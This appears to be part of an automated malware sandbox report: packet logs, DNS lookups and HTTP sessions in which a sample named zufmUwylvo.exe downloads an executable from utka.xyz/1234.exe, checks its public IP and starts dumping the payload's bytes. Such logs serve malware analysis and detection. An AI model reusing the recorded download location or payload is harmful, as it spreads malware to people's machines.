                                                                                                    Oct 9, 2024 16:30:21.119541883 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.119708061 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.119729996 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:21.119755030 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.119900942 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:21.119947910 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:21.120120049 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:21.120327950 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.120495081 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.120630980 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:21.120800018 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:21.121002913 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.121212006 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:21.121383905 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:21.121503115 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.121738911 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.121751070 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.121771097 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:21.121939898 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:21.121993065 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:21.122159958 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:21.336527109 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.336740971 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:21.339435101 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.339634895 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:21.339803934 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:21.339864016 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.340038061 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.340193987 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:21.340363026 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:21.340802908 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.341118097 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.341242075 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.341301918 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:21.341365099 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.341531038 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.341568947 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:21.341739893 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:21.341801882 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.342058897 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.342129946 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:21.342298031 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:21.342570066 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.342751026 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:21.342922926 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:21.344744921 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.344846010 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.344938993 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:21.345012903 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.345108032 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:21.345160007 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.345324039 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:21.345421076 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.345494986 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:21.345618963 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.345664024 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:21.346004009 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:21.356925011 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.357027054 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.357280016 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:21.357822895 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.357959032 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:21.357969999 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.358129978 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:21.358130932 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.358176947 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:21.358347893 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:21.358517885 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:21.358622074 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.358688116 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:21.358743906 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.358753920 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.358762980 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.358784914 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.358858109 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:21.358997107 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.359006882 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.359030962 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:21.359090090 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.359200001 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:21.359368086 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:21.359538078 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:21.359694004 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.359922886 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:21.360023975 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.360094070 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:21.360127926 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.360317945 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:21.360332012 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.360403061 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.360485077 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:21.360567093 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.360702038 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:21.360769987 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.360872030 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:21.360934019 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.361093998 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.361213923 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:21.361380100 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:21.426440954 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.426703930 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:21.575581074 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.575726032 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:21.575895071 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:21.577824116 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.577960014 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.578059912 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:21.578226089 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:21.578298092 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:21.580111027 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.580178022 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.580193996 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.580518961 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:21.580528021 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.580542088 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:21.580622911 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:21.580786943 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:21.580852985 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.580960989 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:21.581124067 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:21.581393003 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.581511974 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.581634045 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:21.581778049 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:21.581823111 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.581828117 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:21.581999063 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:21.583372116 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.583492041 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.583584070 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:21.583755016 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:21.583931923 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.584076881 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.584114075 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:21.584335089 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:21.584347010 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.584724903 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:21.595900059 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.595999002 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.596009970 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.596072912 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.596081972 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:21.596255064 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:21.596265078 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.596301079 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:21.596471071 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:21.598483086 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.598691940 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:21.598762035 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.598870039 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:21.598912001 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:21.598933935 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.599061012 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:21.599123955 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.599229097 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:21.599277020 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.599381924 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.599399090 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:21.599560976 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.599602938 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:21.599766016 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:21.599927902 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:21.599961996 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.600260019 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:21.723119974 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.814280033 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.816322088 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.816333055 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.819283962 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.819515944 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.819796085 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.819978952 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.820132017 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.820333958 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.820979118 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.821033955 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.821288109 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.821816921 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.821939945 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.822057009 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.822231054 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.822371006 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.822381973 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.822808981 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.822942972 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.822953939 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.823024035 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.823270082 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.823378086 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.824938059 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.834400892 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.835419893 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.838182926 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.838416100 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.838737965 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.839250088 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.839720011 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.839967966 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.840102911 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.840269089 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.840641975 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.840986967 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.841300011 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.841542006 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.841799974 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.841957092 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.842081070 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.842226982 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.842324972 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.842580080 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.842700005 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.852458000 CEST34978189.23.100.233192.168.11.30
                                                                                                    Oct 9, 2024 16:30:21.884237051 CEST497813192.168.11.3089.23.100.233
                                                                                                    Oct 9, 2024 16:30:21.884299040 CEST4977780192.168.11.30104.16.184.241
                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                    Oct 9, 2024 16:29:48.517479897 CEST5645653192.168.11.301.1.1.1
                                                                                                    Oct 9, 2024 16:29:48.636847973 CEST53564561.1.1.1192.168.11.30
                                                                                                    Oct 9, 2024 16:30:05.779073000 CEST6381453192.168.11.301.1.1.1
                                                                                                    Oct 9, 2024 16:30:05.873769999 CEST53638141.1.1.1192.168.11.30
                                                                                                    Oct 9, 2024 16:30:06.129405022 CEST6548253192.168.11.301.1.1.1
                                                                                                    Oct 9, 2024 16:30:06.226722956 CEST53654821.1.1.1192.168.11.30
                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                    Oct 9, 2024 16:29:48.517479897 CEST192.168.11.301.1.1.10xc68aStandard query (0)utka.xyzA (IP address)IN (0x0001)false
                                                                                                    Oct 9, 2024 16:30:05.779073000 CEST192.168.11.301.1.1.10xebfaStandard query (0)icanhazip.comA (IP address)IN (0x0001)false
                                                                                                    Oct 9, 2024 16:30:06.129405022 CEST192.168.11.301.1.1.10x3c57Standard query (0)229.116.3.0.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                    Oct 9, 2024 16:29:48.636847973 CEST1.1.1.1192.168.11.300xc68aNo error (0)utka.xyz84.32.84.151A (IP address)IN (0x0001)false
                                                                                                    Oct 9, 2024 16:30:05.873769999 CEST1.1.1.1192.168.11.300xebfaNo error (0)icanhazip.com104.16.184.241A (IP address)IN (0x0001)false
                                                                                                    Oct 9, 2024 16:30:05.873769999 CEST1.1.1.1192.168.11.300xebfaNo error (0)icanhazip.com104.16.185.241A (IP address)IN (0x0001)false
                                                                                                    Oct 9, 2024 16:30:06.226722956 CEST1.1.1.1192.168.11.300x3c57Name error (3)229.116.3.0.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                                                                    • utka.xyz
                                                                                                    • icanhazip.com
                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    0192.168.11.3049777104.16.184.241804540C:\Users\user\Desktop\zufmUwylvo.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    Oct 9, 2024 16:30:05.969144106 CEST63OUTGET / HTTP/1.1
                                                                                                    Host: icanhazip.com
                                                                                                    Connection: Keep-Alive
                                                                                                    Oct 9, 2024 16:30:06.123402119 CEST537INHTTP/1.1 200 OK
                                                                                                    Date: Wed, 09 Oct 2024 14:30:06 GMT
                                                                                                    Content-Type: text/plain
                                                                                                    Content-Length: 15
                                                                                                    Connection: keep-alive
                                                                                                    Access-Control-Allow-Origin: *
                                                                                                    Access-Control-Allow-Methods: GET
                                                                                                    Set-Cookie: __cf_bm=eeCrMF9_CtMofE414kyqrc8zQ_gToRIJE.yUBe29nv8-1728484206-1.0.1.1-O9BIIBaw5a5gyNFuJw8HAZ0aE5ppC_2U9m8zryStPUIxCMQwpU8dJome2GKEDjFMhqo.6yNcf5n.6gYRQvLpuQ; path=/; expires=Wed, 09-Oct-24 15:00:06 GMT; domain=.icanhazip.com; HttpOnly
                                                                                                    Server: cloudflare
                                                                                                    CF-RAY: 8cff110f9c470f65-EWR
                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                    Data Raw: 31 39 31 2e 39 36 2e 31 35 30 2e 31 38 37 0a
                                                                                                    Data Ascii: 191.96.150.187


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    0192.168.11.304977584.32.84.1514434540C:\Users\user\Desktop\zufmUwylvo.exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2024-10-09 14:29:48 UTC66OUTGET /1234.exe HTTP/1.1
                                                                                                    Host: utka.xyz
                                                                                                    Connection: Keep-Alive
                                                                                                    2024-10-09 14:29:49 UTC535INHTTP/1.1 200 OK
                                                                                                    Server: hcdn
                                                                                                    Date: Wed, 09 Oct 2024 14:29:49 GMT
                                                                                                    Content-Type: application/x-executable
                                                                                                    Content-Length: 20970496
                                                                                                    Connection: close
                                                                                                    last-modified: Mon, 30 Sep 2024 19:13:56 GMT
                                                                                                    etag: "13ffc00-66faf874-6cb4d912d515bc0b;;;"
                                                                                                    platform: hostinger
                                                                                                    panel: hpanel
                                                                                                    content-security-policy: upgrade-insecure-requests
                                                                                                    x-turbo-charged-by: LiteSpeed
                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                    x-hcdn-request-id: 41b50fc6795a9c3f59bbbb1239c4ffff-bos-edge1
                                                                                                    x-hcdn-cache-status: MISS
                                                                                                    x-hcdn-upstream-rt: 0.010
                                                                                                    Accept-Ranges: bytes
                                                                                                    2024-10-09 14:29:49 UTC834INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 68 72 ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 0e 00 99 f4 fa 66 00 00 00 00 00 00 00 00 f0 00 2f 02 0b 02 02 26 00 ae 01 00 00 5c 5b 00 00 26 00 00 52 0a 5d 01 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 00 00 00 00 05 00 02 00 00 00 00 00 00 f0 40 02 00 04 00 00 52 85 40 01 02 00 20 01 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00
                                                                                                    Data Ascii: MZ@hr!L!This program cannot be run in DOS mode.$PEdf/&\[&R]@@R@
                                                                                                    2024-10-09 14:29:49 UTC1369INData Raw: 4b 69 00 00 00 00 58 00 00 00 00 e0 00 01 00 02 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 2e 3e 66 00 00 00 00 a8 ed 3f 01 00 f0 00 01 00 ee 3f 01 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 68 2e 72 73 72 63 00 00 00 c0 06 00 00 00 e0 40 02 00 08 00 00 00 f4 3f 01 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 84 b7 27 01 00 00 00 00 00 00 00 00 00 00 00 00 dc 43 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                    Data Ascii: KiX@..>f??`h.rsrc@?@@'C
                                                                                                    2024-10-09 14:29:49 UTC1369INData Raw: 5a 71 33 2f ed fe 1a 19 33 2f ed 0e ba c1 33 2f ed ee cb e9 33 2f ed 6e 3a d1 33 2f ed 8e 8a aa 4e 8f ea be d6 2f 37 58 c7 d0 58 d2 2b a3 1f 17 11 10 d2 2b a3 1f cf 59 98 d2 2b a3 67 cf 59 30 d2 2b a3 af 77 a1 d7 ba 27 43 6f cf e9 c3 c4 7c 1b b2 6f 3d a7 88 12 c9 fa e9 3d 10 38 3f d6 16 b8 36 af a9 62 3b 86 1d 24 08 e2 ff 7b c4 c1 2e 78 1b 51 b6 14 fe 2c 30 fc e9 ca 50 d5 35 6e ed 18 2d e7 66 75 67 b8 c6 1e 20 bf d2 41 79 41 00 11 b9 28 d5 6b f2 36 de 2d f8 19 8f 40 73 48 14 a4 0b 20 2a 37 1e 38 a0 72 16 be f4 ca 33 e9 32 e2 1d c0 a8 c5 2d b7 eb db f5 fa c9 61 16 cf f6 29 eb f0 dc 1a f0 cf a7 e3 74 8d b7 eb 5b 66 43 75 35 96 d3 e1 cc 5d 62 2d 8e 44 d5 05 37 94 35 64 87 22 73 48 14 24 07 2e a4 2b 66 13 1f 7b 8d d2 68 51 8d b7 eb 5b 8a 2a f8 90 47 39 94 2e
                                                                                                    Data Ascii: Zq3/3/3/3/n:3/N/7XX++Y+gY0+w'Co|o==8?6b;${.xQ,0P5n-fug AyA(k6-@sH *78r32-a)t[fCu5]b-D75d"sH$.+f{hQ[*G9.
